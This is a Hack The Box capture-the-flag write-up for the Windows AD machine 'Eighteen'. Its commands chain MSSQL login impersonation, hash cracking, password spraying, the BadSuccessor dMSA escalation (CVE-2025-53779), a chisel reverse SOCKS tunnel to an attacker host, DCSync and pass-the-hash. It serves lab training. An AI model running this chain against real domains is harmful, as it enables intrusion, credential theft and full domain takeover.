Eighteen – Hack The Box Writeup#

Eighteen is a Easy Windows AD box that chains classic MSSQL abuse with modern Windows Server 2025 dMSA exploitation (the famous BadSuccessor technique, CVE-2025-53779).

Provided credentials
Username: kevin
Password: iNa2we6haRj2gaw!

Valid on MSSQL.

1. Initial Reconnaissance#

1
nmap -p- --min-rate 1000 -sV -sC -A -oN nmap $ip

Key ports:

1
PORT     STATE SERVICE  VERSION
2
80/tcp   open  http     Microsoft IIS httpd 10.0
3
|_http-title: Did not follow redirect to http://eighteen.htb/
4
|_http-server-header: Microsoft-IIS/10.0
5
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
6
| ms-sql-info:
7
|   $ip:1433:
8
|     Version:
9
|       name: Microsoft SQL Server 2022 RC0+
10
|       number: 16.00.1000.00
11
|       Product: Microsoft SQL Server 2022
12
|       Service pack level: RC0
13
|       Post-SP patches applied: true
14
|_    TCP port: 1433
15
| ms-sql-ntlm-info:
16
|     $ip:1433:
17
|     Target_Name: EIGHTEEN
18
|     NetBIOS_Domain_Name: EIGHTEEN
19
|     NetBIOS_Computer_Name: DC01
20
|     DNS_Domain_Name: eighteen.htb
21
|     DNS_Computer_Name: DC01.eighteen.htb
22
|     DNS_Tree_Name: eighteen.htb
23
|_    Product_Version: 10.0.26100
24
|_ssl-date: 2025-11-16T20:00:37+00:00; +7h00m40s from scanner time.
25
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
26
| Not valid before: 2025-11-16T19:51:00
27
|_Not valid after:  2055-11-16T19:51:00
28
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
29
|_http-title: Not Found
30
|_http-server-header: Microsoft-HTTPAPI/2.0
31
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
32
Device type: general purpose
33
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
34
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
35
No exact OS matches for host (test conditions non-ideal).
36
Network Distance: 2 hops
37
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
38

39
Host script results:
40
|_clock-skew: mean: 7h00m39s, deviation: 0s, median: 7h00m39s

2. MSSQL Enumeration & Impersonation#

RID brute with nxc

1
nxc mssql DC01.eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute

Save users to user.txt

Connect with impacket:

1
impacket-mssqlclient kevin:iNa2we6haRj2gaw\\!@$ip

Check server permissions:

1
SELECT * FROM sys.server_permissions

Key finding → principal_id 268 can IMPERSONATE login 267!

Resolve names:

1
SELECT principal_id, name FROM sys.server_principals WHERE principal_id IN (267,268);

→ appdev (267) can be impersonated by our login (268)

List databases → interesting one: financial_planner, but we donot have permission to access it.

Impersonate:

1
EXECUTE AS LOGIN = 'appdev';

Now that we have the appdev user, we can access the financial_planner database, as this user has the necessary permissions.

We then dumped all entries from the users table using the following query:

1
SELECT * FROM users;

3. PBKDF2 Hash Extraction & Cracking#

Found script: https://gist.github.com/marcos-venicius/858061c6c5709ad1a2f0e305b65a27f8

Convert PBKDF2 format for hashcat:

1
python3 pkdf2_to_hashcat.py 'pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'

Crack with hashcat:

1
hashcat -a 0 -m 10900 hash.txt ./rock.txt

→ Password: iloveyou1

4. Foothold via WinRM#

Spray cracked password against users that we have saved from rid-brute:

1
nxc winrm DC01.eighteen.htb -u user.txt -p iloveyou1 --continue-on-success

→ adam.scott valid!

Evil-WinRM login:

1
evil-winrm -i 10.10.11.95 -u adam.scott -p iloveyou1

Group membership: Member of IT group.

5. Internal Enumeration – ACL Abuse#

1
net group "IT" /domain
2
net user bob.brown /domain
3
whoami /groups

Upload & load PowerView.ps1:

1
Find-InterestingDomainAcl

Key finding → IT group has CreateChild permissions on OU=Staff,DC=eighteen,DC=htb

→ Vulnerable to BadSuccessor (CVE-2025-53779) — dMSA privilege escalation!

Reference: https://github.com/akamai/BadSuccessor
CVE Details: Windows Kerberos EoP via dMSA abuse (patched Aug 2025, but box is vulnerable)

6. BadSuccessor Exploitation#

Run BadSuccessor tool:

1
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "nory_dmsa" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"

→ Creates exploitable dMSA linked to Administrator!

7. SOCKS Proxy & Ticket Harvesting#

Set up reverse tunnel with chisel:

Victim → attacker:

1
.\chisel.exe client $attacker_ip:8080 R:1080:socks

Attacker:

1
chisel server -p 8080 --reverse

Update proxychains.conf:

Get ST (service ticket) as nory_dmsa$ (DMSA machine account):

1
proxychains getST.py eighteen.htb/adam.scott:iloveyou1 -impersonate "nory_dmsa$" -dc-ip 10.10.11.95 -self -dmsa

8. DCSync as Administrator#

1
KRB5CCNAME=bad_DMSA$.ccache proxychains impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dcuser Administrator -dc-ip 10.10.11.95

→ Administrator NTLM hash dumped!

9. SYSTEM / Root Flag#

1
evil-winrm -u administrator -H 0b133be956bfaddf9cea56701affddec -i 10.10.11.95

Now we can see the root.txt

Machine pwned! ✓

Attack Chain Summary#

1
kevin creds → MSSQL → impersonate appdev → PBKDF2 hash → crack → adam.scott foothold (IT group)
2
   ↓
3
Find CreateChild on OU=Staff → BadSuccessor (CVE-2025-53779) → create dMSA linked to Administrator
4
   ↓
5
Chisel SOCKS → getST.py (DMSA impersonation) → service ticket as nory_dmsa$
6
   ↓
7
DCSync as Administrator → hash → PTH → evil-winrm SYSTEM

Main vulns/misconfigs:

MSSQL impersonation chain
Weak PBKDF2 password
Dangerous CreateChild delegation on OU
Unpatched BadSuccessor dMSA abuse (CVE-2025-53779)

Great box — perfect mix of classic and cutting-edge AD attacks!

Happy hacking! ༼ つ ◕_◕ ༽つ